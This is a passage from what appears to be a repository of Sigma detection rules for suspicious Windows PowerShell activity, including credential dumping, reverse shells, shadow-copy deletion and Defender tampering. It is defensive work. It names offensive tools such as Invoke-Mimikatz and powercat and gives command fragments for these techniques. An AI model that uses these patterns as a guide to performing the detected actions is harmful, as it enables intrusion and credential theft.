           - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-Screenshot'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'HTTP-Login'\n            - 'Install-ServiceBinary'\n            - 'Install-SSP'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon'\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 
'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 
'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-DNSRecordArray'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-MachineAccount'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'Port-Scan'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-MachineAccount'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Set-MacAttribute'\n            - 'Set-MachineAccountAttribute'\n            - 'Set-Wallpaper'\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'Veeam-Get-Creds'\n            - 'VolumeShadowCopyTools'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml",
    "content": "title: MSExchange Transport Agent Installation\nid: 83809e84-4475-4b69-bc3e-4aad8568612f\nrelated:\n    - id: 83809e84-4475-4b69-bc3e-4aad8568612f\n      type: similar\nstatus: test\ndescription: Detects the Installation of a Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml",
    "content": "title: Non Interactive PowerShell Process Spawned\nid: f4bbd493-b796-416e-bbf2-121235348529\nstatus: test\ndescription: Detects non-interactive PowerShell activity by looking for a \"powershell\" process whose parent is not a user GUI process such as \"explorer.exe\".\nreferences:\n    - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\nauthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)\ndate: 2019-09-12\nmodified: 2025-02-28\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    filter_main_generic:\n        ParentImage|endswith:\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\System32\\CompatTelRunner.exe'\n            - ':\\Windows\\SysWOW64\\explorer.exe'\n    filter_main_windows_update:\n        ParentImage: ':\\$WINDOWS.~BT\\Sources\\SetupHost.exe' # During Windows updates/upgrades\n        # CommandLine: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n    filter_optional_vscode:\n        # Triggered by VsCode when you open a Shell inside the workspace\n        ParentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        ParentCommandLine|contains: ' --ms-enable-electron-run-as-node '\n    filter_optional_terminal:\n        ParentImage|contains: ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_'\n        ParentImage|endswith: '\\WindowsTerminal.exe'\n    filter_optional_defender:\n        ParentImage|endswith: ':\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml",
    "content": "title: Potential PowerShell Obfuscation Via WCHAR/CHAR\nid: e312efd0-35a1-407f-8439-b8d434b438a6\nstatus: test\ndescription: Detects suspicious encoded character syntax often used for defense evasion\nreferences:\n    - https://twitter.com/0gtweet/status/1281103918693482496\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-09\nmodified: 2025-03-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '[char]0x'\n            - '(WCHAR)0x'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml",
    "content": "title: Execution of Powershell Script in Public Folder\nid: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4\nstatus: test\ndescription: This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder\nreferences:\n    - https://www.mandiant.com/resources/evolution-of-fin7\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - '-f C:\\Users\\Public'\n            - '-f \"C:\\Users\\Public'\n            - '-f %Public%'\n            - '-fi C:\\Users\\Public'\n            - '-fi \"C:\\Users\\Public'\n            - '-fi %Public%'\n            - '-fil C:\\Users\\Public'\n            - '-fil \"C:\\Users\\Public'\n            - '-fil %Public%'\n            - '-file C:\\Users\\Public'\n            - '-file \"C:\\Users\\Public'\n            - '-file %Public%'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml",
    "content": "title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses\nid: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5\nrelated:\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: frack113\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Invoke-ATHRemoteFXvGPUDisablementCommand'\n            - 'Invoke-ATHRemoteFXvGPUDisableme'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml",
    "content": "title: Tamper Windows Defender Remove-MpPreference\nid: 07e3cb2c-0608-410d-be4b-1511cb1a0448\nrelated:\n    - id: ae2bdd58-0681-48ac-be7f-58ab4e593458\n      type: similar\nstatus: test\ndescription: Detects attempts to remove Windows Defender configurations using the 'Remove-MpPreference' cmdlet\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_remove:\n        CommandLine|contains: 'Remove-MpPreference'\n    selection_tamper:\n        CommandLine|contains:\n            - '-ControlledFolderAccessProtectedFolders '\n            - '-AttackSurfaceReductionRules_Ids '\n            - '-AttackSurfaceReductionRules_Actions '\n            - '-CheckForSignaturesBeforeRunningScan '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml",
    "content": "title: Potential Powershell ReverseShell Connection\nid: edc2f8ae-2412-4dfd-b9d5-0c57727e70be\nstatus: stable\ndescription: Detects usage of the \"TcpClient\" class, which can be abused to establish remote connections and reverse shells, as seen in the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and others.\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1\nauthor: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-04-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' Net.Sockets.TCPClient'\n            - '.GetStream('\n            - '.Write('\n    condition: all of selection_*\nfalsepositives:\n    - In rare administrative cases, this function might be used to check network connectivity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml",
    "content": "title: Run PowerShell Script from ADS\nid: 45a594aa-1fbd-4972-a809-ff5a99dd81b8\nstatus: test\ndescription: Detects PowerShell script execution from Alternate Data Stream (ADS)\nreferences:\n    - https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1\nauthor: Sergey Soldatov, Kaspersky Lab, oscd.community\ndate: 2019-10-30\nmodified: 2022-07-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Get-Content'\n            - '-Stream'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml",
    "content": "title: Run PowerShell Script from Redirected Input Stream\nid: c83bf4b5-cdf0-437c-90fa-43d734f7c476\nstatus: test\ndescription: Detects PowerShell script execution via input stream redirect\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml\n    - https://twitter.com/Moriarty_Meng/status/984380793383370752\nauthor: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community\ndate: 2020-10-17\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|re: '\\s-\\s*<'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml",
    "content": "title: PowerShell SAM Copy\nid: 1af57a4b-460a-4738-9034-db68b880c665\nstatus: test\ndescription: Detects suspicious PowerShell scripts accessing SAM hives\nreferences:\n    - https://twitter.com/splinter_code/status/1420546784250769408\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-29\nmodified: 2023-01-06\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '\\HarddiskVolumeShadowCopy'\n            - 'System32\\config\\sam'\n    selection_2:\n        CommandLine|contains:\n            - 'Copy-Item'\n            - 'cp $_.'\n            - 'cpi $_.'\n            - 'copy $_.'\n            - '.File]::Copy('\n    condition: all of selection*\nfalsepositives:\n    - Some rare backup scenarios\n    - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml",
    "content": "title: Suspicious PowerShell Invocation From Script Engines\nid: 95eadcb2-92e4-4ed1-9031-92547773a6db\nstatus: test\ndescription: Detects suspicious powershell invocations from interpreters or unusual programs\nreferences:\n    - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_health_service:\n        CurrentDirectory|contains: '\\Health Service State\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Microsoft Operations Manager (MOM)\n    - Other scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml",
    "content": "title: Suspicious Service DACL Modification Via Set-Service Cmdlet\nid: a95b9b42-1308-4735-a1af-abb1c5e6f5ac\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37\n      type: derived\nstatus: test\ndescription: Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (only available in PowerShell 7) that can be used to hide services or make them unstoppable\nreferences:\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\pwsh.exe'\n        - OriginalFileName: 'pwsh.dll'\n    selection_sddl_flag:\n        CommandLine|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    selection_set_service:\n        CommandLine|contains|all:\n            - 'Set-Service '\n            - 'D;;'\n        CommandLine|contains:\n            - ';;;IU'\n            - ';;;SU'\n            - ';;;BA'\n            - ';;;SY'\n            - ';;;WD'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml",
    "content": "title: PowerShell Script Change Permission Via Set-Acl\nid: bdeb2cff-af74-4094-8426-724dc937f20a\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell execution to set the ACL of a file or a folder\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cmdlet:\n        CommandLine|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n            - '-Path '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml",
    "content": "title: PowerShell Set-Acl On Windows Folder\nid: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts to set the ACL to a file in the Windows folder\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cmdlet:\n        CommandLine|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n    selection_paths:\n        # Note: Add more suspicious paths\n        CommandLine|contains:\n            - '-Path \"C:\\Windows'\n            - \"-Path 'C:\\\\Windows\"\n            - '-Path %windir%'\n            - '-Path $env:windir'\n    selection_permissions:\n        # Note: Add more suspicious permissions\n        CommandLine|contains:\n            - 'FullControl'\n            - 'Allow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml",
    "content": "title: Change PowerShell Policies to an Insecure Level\nid: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock\n      type: similar\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry\n      type: similar\nstatus: test\ndescription: Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4\n    - https://adsecurity.org/?p=2604\n    - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\nauthor: frack113\ndate: 2021-11-01\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'powershell_ise.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_option:\n        CommandLine|contains:\n            - '-executionpolicy '\n            - ' -ep '\n            - ' -exec '\n    selection_level:\n        CommandLine|contains:\n            - 'Bypass'\n            - 'Unrestricted'\n    filter_main_powershell_core:\n        ParentImage:\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains:\n            - '-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\'\n            - '-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\'\n    filter_optional_avast:\n        ParentImage|contains:\n            - 'C:\\Program Files\\Avast Software\\Avast\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\'\n            - '\\instup.exe'\n        CommandLine|contains:\n            - '-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast'\n            - '-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml",
    "content": "title: Service StartupType Change Via PowerShell Set-Service\nid: 62b20d44-1546-4e61-afce-8e175eb9473c\nstatus: test\ndescription: Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\powershell.exe'\n        - OriginalFileName: 'PowerShell.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Set-Service'\n            - '-StartupType'\n        CommandLine|contains:\n            - 'Disabled'\n            - 'Manual'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur with troubleshooting scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml",
    "content": "title: Deletion of Volume Shadow Copies via WMI with PowerShell\nid: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\nrelated:\n    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e\n      type: derived\n    - id: c1337eb8-921a-4b59-855b-4ba188ddcc42\n      type: similar\nstatus: test\ndescription: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-20\nmodified: 2022-12-30\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_get:\n        CommandLine|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n            - 'Get-CimInstance'\n            - 'gcim'\n    selection_shadowcopy:\n        CommandLine|contains: 'Win32_ShadowCopy'\n    selection_delete:\n        CommandLine|contains:\n            - '.Delete()'\n            - 'Remove-WmiObject'\n            - 'rwmi'\n            - 'Remove-CimInstance'\n            - 'rcim'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml",
    "content": "title: Exchange PowerShell Snap-Ins Usage\nid: 25676e10-2121-446e-80a4-71ff8506af47\nstatus: test\ndescription: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://www.intrinsec.com/apt27-analysis/\nauthor: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-03-24\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.collection\n    - attack.t1114\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains: 'Add-PSSnapin'\n    selection_module:\n        CommandLine|contains:\n            - 'Microsoft.Exchange.Powershell.Snapin'\n            - 'Microsoft.Exchange.Management.PowerShell.SnapIn'\n    filter_msiexec:\n        # ParentCommandLine: C:\\Windows\\System32\\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\\MSI0000\n        ParentImage: 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains: '$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml",
